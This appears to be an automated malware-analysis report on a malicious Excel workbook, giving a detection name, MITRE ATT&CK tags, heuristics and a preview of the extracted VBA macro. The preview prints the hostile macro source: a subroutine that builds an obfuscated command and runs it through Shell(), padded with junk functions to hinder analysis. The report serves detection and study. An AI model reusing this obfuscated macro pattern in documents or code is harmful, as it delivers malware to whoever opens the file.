MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro. The macro's 'Pimp' subroutine attempts to construct and execute a command using obfuscated string concatenation. This behavior is characteristic of malware that downloads and executes additional payloads, as suggested by the ClamAV detection name 'Xls.Malware.Stratos-7506050-0'.
Heuristics 3
-
ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 28690 bytes |
SHA-256: 876de2fadf2904072d32dc58492b3aba65c238af6edcacedea4f566e5cb71f77 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Public Sub Pimp()
Y6 = YoTpIoY3l(" ? M < ", "imWrrmwfH")
Shell (Y6 + YoTpIoY3l("W=8Rv&9;; Y }", "mad8XKIgZ"))
End Sub
Private Sub kIBxIaoKxHfaDElFKS()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
End Sub
Private Function MpuHEnAaaBJQySVnNoztLuQALRNZq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
End Function
Public Function SwbZGvPFwKUDDq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
End Function
Public Sub cieqGHdfoLsVmSZsApU()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
End Sub
Private Sub GtUrDRzQCGhURLebyTs()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
End Sub
Public Sub SQxQicusOkI()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
End Sub
Private Function GLjqxbonDHKBbqjSA()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End
End Function
Public Function NeEETJMEdGljQFaQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End
GoTo NBBdlxatZwObOMGZVs
NBBdlxatZwObOMGZVs:
End Function
Public Sub nsoARSopyQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 107008 bytes |
SHA-256: 9f1e3794c339f2e9a0715f581ea2926bf7b8f6ffd89d96a82a57082e5ab592b7 |
|||
|
Detection
ClamAV:
Xls.Malware.Stratos-7506050-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.